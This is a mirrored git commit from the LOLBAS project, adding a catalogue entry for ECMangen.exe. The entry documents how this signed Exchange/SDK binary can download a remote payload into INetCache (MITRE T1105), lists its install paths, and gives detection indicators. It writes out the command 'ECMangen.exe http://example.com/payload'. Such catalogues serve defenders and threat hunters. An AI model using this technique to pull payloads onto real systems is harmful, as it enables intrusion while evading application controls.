mirror of
https://github.com/LOLBAS-Project/LOLBAS
synced 2025-01-12 23:11:40 +01:00
Add ECMangen.yml
This commit is contained in:
parent
2cc0ee99e6
commit
5b17be1bed
32
yml/OtherMSBinaries/ECMangen.yml
Normal file
32
yml/OtherMSBinaries/ECMangen.yml
Normal file
@ -0,0 +1,32 @@
|
|||||||
|
---
|
||||||
|
Name: ECMangen.exe
|
||||||
|
Description: Command-line tool for managing certificates in Microsoft Exchange Server.
|
||||||
|
Author: Avihay Eldad
|
||||||
|
Created: 2024-04-30
|
||||||
|
Commands:
|
||||||
|
- Command: ECMangen.exe http://example.com/payload
|
||||||
|
Description: Downloads payload from remote server
|
||||||
|
Usecase: It will download a remote payload and place it in INetCache
|
||||||
|
Category: Download
|
||||||
|
Privileges: User
|
||||||
|
MitreID: T1105
|
||||||
|
OperatingSystem: Windows
|
||||||
|
Tags:
|
||||||
|
- Download: INetCache
|
||||||
|
Full_Path:
|
||||||
|
- Path: C:\Program Files (x86)\Microsoft SDKs\Windows\v7.1A\Bin\ECMangen.exe
|
||||||
|
- Path: C:\Program Files (x86)\Microsoft SDKs\Windows\v7.1A\Bin\x64\ECMangen.exe
|
||||||
|
- Path: C:\Program Files\Microsoft\Exchange Server\V12\Bin\ECMangen.exe
|
||||||
|
- Path: C:\Program Files\Microsoft\Exchange Server\V13\Bin\ECMangen.exe
|
||||||
|
- Path: C:\Program Files\Microsoft\Exchange Server\V14\Bin\ECMangen.exe
|
||||||
|
- Path: C:\Program Files\Microsoft\Exchange Server\V15\Bin\ECMangen.exe
|
||||||
|
- Path: C:\Program Files\Microsoft\Exchange Server\Bin\ECMangen.exe
|
||||||
|
- Path: C:\Program Files\Microsoft\Exchange Server\ClientAccess\Bin\ECMangen.exe
|
||||||
|
- Path: C:\ExchangeServer\Bin\ECMangen.exe
|
||||||
|
Detection:
|
||||||
|
- IOC: URL on a ECMangen command line
|
||||||
|
- IOC: ECMangen making unexpected network connections or DNS requests
|
||||||
|
Acknowledgement:
|
||||||
|
- Person: Avihay Eldad
|
||||||
|
Handle: '@AvihayEldad'
|
||||||
|
|
Loading…
Reference in New Issue
Block a user